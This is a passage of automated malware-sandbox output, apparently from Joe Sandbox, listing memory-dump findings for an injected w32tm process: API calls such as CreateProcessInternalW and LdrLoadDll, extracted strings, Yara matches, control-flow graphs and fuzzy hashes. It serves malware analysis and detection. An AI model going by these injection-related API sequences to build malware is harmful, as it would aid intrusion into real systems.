                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 537 961550-9615ba call 97bed0 call 97c8e0 call 964d50 call 951410 call 9724a0 549 9615bc-9615cb PostThreadMessageW 537->549 550 9615da-9615e0 537->550 549->550 551 9615cd-9615d7 549->551 551->550
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 009615C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 618 961534-961536 619 96159a-9615ba 618->619 620 961538 618->620 621 9615bc-9615cb PostThreadMessageW 619->621 622 9615da-9615e0 619->622 623 96153a-961541 620->623 624 961598-961599 call 9724a0 620->624 621->622 625 9615cd-9615d7 621->625 624->619 625->622
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 009615C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 009743CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: wininet.dll
                                                                                                                              • API String ID: 3472027048-3354682871
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00964DC2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,00968B2E,00000010,?,?,?,00000044,?,00000010,00968B2E,?,?,?), ref: 0097A190
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 0095A005
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 0095A005
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00978CB3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,81EC8B55,00000007,00000000,00000004,00000000,009645C4,000000F4), ref: 0097A0DF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(009621E9,?,00976431,009621E9,00975EDF,00976431,?,009621E9,00975EDF,00001000,?,?,?), ref: 0097A08F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(00000002), ref: 00968B9C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,009624F0,0097881F,00975EDF,009624B6), ref: 00968993
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: ddfd0176f1065bf6eb746523c9dfd652a8c9a9a6a617ec8342830d20a8d2e9d2
                                                                                                                              • Instruction ID: 3ec175ee1dc94bcc6cf68c03dc9d884f9268288ae96c39835b36eda82fae3d34
                                                                                                                              • Opcode Fuzzy Hash: ddfd0176f1065bf6eb746523c9dfd652a8c9a9a6a617ec8342830d20a8d2e9d2
                                                                                                                              • Instruction Fuzzy Hash: A5D05E72A842056EF610EBE4DC47FB7228D9B9436AF084464B91CDA2D2E825E5104A21
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,009624F0,0097881F,00975EDF,009624B6), ref: 00968993
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: f6aa15bb4077a8e0c89501a823cfb76e23af13ec337fcde5af642141c16b359b
                                                                                                                              • Instruction ID: 16f6f2fcde5a201345e45427d5fe4bc0efa008d8fc115bbe05b8097068a11e4d
                                                                                                                              • Opcode Fuzzy Hash: f6aa15bb4077a8e0c89501a823cfb76e23af13ec337fcde5af642141c16b359b
                                                                                                                              • Instruction Fuzzy Hash: 94D05E726803043BF600EBE5CC47F77328C8B84769F084464BA0CDB2C2EC65E5104A65
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a06046cb247960a6ca36f406581da5441d4b0ad38e1818d76e4b2a49df2946f9
                                                                                                                              • Instruction ID: 99d0cfe1ec046f2b3d6d5f6bc33766deed985b0ed514e0a73dab9ace993b0a03
                                                                                                                              • Opcode Fuzzy Hash: a06046cb247960a6ca36f406581da5441d4b0ad38e1818d76e4b2a49df2946f9
                                                                                                                              • Instruction Fuzzy Hash: 12B02B318014D4C9DE00F3204A087073904A7C0300F19C061D3030641E0338C0D0E171
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                              • API String ID: 0-3558027158
                                                                                                                              • Opcode ID: a774fcbadcaf67f1004be594f1f26ba9564a83aea78016218ee0757c7ff9507f
                                                                                                                              • Instruction ID: 65974efe9142ba2299015f908ebdb5bbb18c92ea3a228818d6f5cf25e886fc13
                                                                                                                              • Opcode Fuzzy Hash: a774fcbadcaf67f1004be594f1f26ba9564a83aea78016218ee0757c7ff9507f
                                                                                                                              • Instruction Fuzzy Hash: 2E915FF04182988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 3b6b562a4c4d0fc25f88cab7c5752fed8fb80abd1f993b623b667866b12cd9d9
                                                                                                                              • Instruction ID: af761503e9beab4b949732888a47152f44ffbee324f503e3baebfe9af4a58726
                                                                                                                              • Opcode Fuzzy Hash: 3b6b562a4c4d0fc25f88cab7c5752fed8fb80abd1f993b623b667866b12cd9d9
                                                                                                                              • Instruction Fuzzy Hash: CA51E6B6A04626AFDB24EB988CD097FF7BCBB08201754856AF465D7685D334DE108BA0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: fee4aade2d82224768ab47a9fa0f740eee821cddac8461b4f82e3fa124251491
                                                                                                                              • Instruction ID: 9e5ec79db8b48c7590f57d293a98c25abaf0d51cf1228a2c3c8f38f6790a5d88
                                                                                                                              • Opcode Fuzzy Hash: fee4aade2d82224768ab47a9fa0f740eee821cddac8461b4f82e3fa124251491
                                                                                                                              • Instruction Fuzzy Hash: BF5125B5E00649AFCB64CF5CCC8087FB7F9AB44201B44885BF9A5DB242D7F4EA008764
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: /AZ;$0>+I$2.76$4MKJ$CSZ;$IJ$INTI$JZR1$OINT$OTJZ$THTH$Z=.W
                                                                                                                              • API String ID: 0-3517495131
                                                                                                                              • Opcode ID: cf7a1e310bb36753b3f6379a81bfea86a23076433385ea146afeb0aec07cae73
                                                                                                                              • Instruction ID: 2d71468fbea8dcf12c2d1c243b32412d64e1a34215392bb39306f2d9d8d63c48
                                                                                                                              • Opcode Fuzzy Hash: cf7a1e310bb36753b3f6379a81bfea86a23076433385ea146afeb0aec07cae73
                                                                                                                              • Instruction Fuzzy Hash: EA3123B095474CDBCB15DF90E080ADDBBB1FF00315F818059E95A7F241C7B98666CB8A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: /AZ;$0>+I$2.76$4MKJ$CSZ;$IJ$INTI$JZR1$OINT$OTJZ$THTH$Z=.W
                                                                                                                              • API String ID: 0-3517495131
                                                                                                                              • Opcode ID: 232ea54cc221144fe77007abf30c0d304b326343cb61e4c2ec5062c19229de77
                                                                                                                              • Instruction ID: b5c568d7f29cd42ea14ea7704ea8fcc0d961d5744f4dd8b5c92e63eaaedadd71
                                                                                                                              • Opcode Fuzzy Hash: 232ea54cc221144fe77007abf30c0d304b326343cb61e4c2ec5062c19229de77
                                                                                                                              • Instruction Fuzzy Hash: F83101B095434CDBCB15DF90E090ADDBBB2FF04315F818059E91A7F241C7B98666CB8A
                                                                                                                              Strings
                                                                                                                              • Execute=1, xrefs: 03414713
                                                                                                                              • ExecuteOptions, xrefs: 034146A0
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03414787
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034146FC
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03414742
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03414725
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03414655
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 33be56c29dbe857ddbebb10d24f478ff9f9b1aab2bc8596e76837ae84615c563
                                                                                                                              • Instruction ID: 0f01dba2f230f323bfaeb4db88a7b5bfa85ab190f5fe7a8530ed9119736b7029
                                                                                                                              • Opcode Fuzzy Hash: 33be56c29dbe857ddbebb10d24f478ff9f9b1aab2bc8596e76837ae84615c563
                                                                                                                              • Instruction Fuzzy Hash: 9E512736A003197ADF10EFA5ECC5BBE77B8EF08700F4404AAE505AF2D1E7719A458B54
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: edefad7050cec72c87ee8d66ce909e343b105ff0cedbddc4931a3143267d8cfa
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 6D81AE74E092699EDF2ACE68C8D17FEFBA6AF45350F1C415AE861A77D0C7349840CB60
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 030aeca62150559c96a8f5bcc1a9b6a8b897b77496b0680fde2f109583cf8a71
                                                                                                                              • Instruction ID: bcd677e5b6b87655abdc99b9aa3533ee31c5326153de3e0ec3cb5ea7e96e8cfd
                                                                                                                              • Opcode Fuzzy Hash: 030aeca62150559c96a8f5bcc1a9b6a8b897b77496b0680fde2f109583cf8a71
                                                                                                                              • Instruction Fuzzy Hash: 18217176E00219ABDB10DE69CC80AAFB7E8AF54640F480517FD05EB241E770D9018BA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: u^$ u^$ u^$ u^$ u^$ u^
                                                                                                                              • API String ID: 0-1252239476
                                                                                                                              • Opcode ID: 9a8a590c3758d3addd801dca9f67bd79450d12dd4a152536180d3e80cbc28122
                                                                                                                              • Instruction ID: 9207e7ff60b9a9dd863568a27e04478027826cf9e67f05be9002d4396b353e97
                                                                                                                              • Opcode Fuzzy Hash: 9a8a590c3758d3addd801dca9f67bd79450d12dd4a152536180d3e80cbc28122
                                                                                                                              • Instruction Fuzzy Hash: 46111E74C0138D9FCF84EFA4E946AEEBBB0FF14200F10555AD919E2240E73896508BD6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: u^$ u^$ u^$ u^$ u^$ u^
                                                                                                                              • API String ID: 0-1252239476
                                                                                                                              • Opcode ID: ea7b926c5507bc9188034aacfcfa42c48f5825feeec891fdcbb1fb9a207a6691
                                                                                                                              • Instruction ID: ada43d18645c761d50652d216259853e7a401b82eff8ffade9ec1b9edc011dde
                                                                                                                              • Opcode Fuzzy Hash: ea7b926c5507bc9188034aacfcfa42c48f5825feeec891fdcbb1fb9a207a6691
                                                                                                                              • Instruction Fuzzy Hash: 1A110074C0138D9FCF44EFA4E546ADFBBB0FF14200F10555AD519A7250E73896548BD6
                                                                                                                              Strings
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034102BD
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034102E7
                                                                                                                              • RTL: Re-Waiting, xrefs: 0341031E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: c10a34793e0d6e17ef615e4eff10c889e0919d78e7f07af15e34a5b34f677421
                                                                                                                              • Instruction ID: e0b00e3e41aa6f42b976f445fa48ebfc88b12286e1a101bd4efff6bd5b90962f
                                                                                                                              • Opcode Fuzzy Hash: c10a34793e0d6e17ef615e4eff10c889e0919d78e7f07af15e34a5b34f677421
                                                                                                                              • Instruction Fuzzy Hash: 60E1DF30614B819FD725CF28C884B2AB7E5BF88324F180A5EF4A58B3E1D774D895CB46
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 03417B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 03417BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03417B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: d1bc407ed81b68c512817377867fcf4504f279a8ae6ce5fbe4c09a35ccaf8a6b
                                                                                                                              • Instruction ID: 4d4e909c72023f49d29677739bda71279995be4627bde4852f28cd72a4c9244c
                                                                                                                              • Opcode Fuzzy Hash: d1bc407ed81b68c512817377867fcf4504f279a8ae6ce5fbe4c09a35ccaf8a6b
                                                                                                                              • Instruction Fuzzy Hash: 7241C0367007029FCB24DE25EC80B6BB7E9EF89710F140A1EF95A9F680DB31E4058B95
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0341728C
                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03417294
                                                                                                                              • RTL: Resource at %p, xrefs: 034172A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 034172C1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
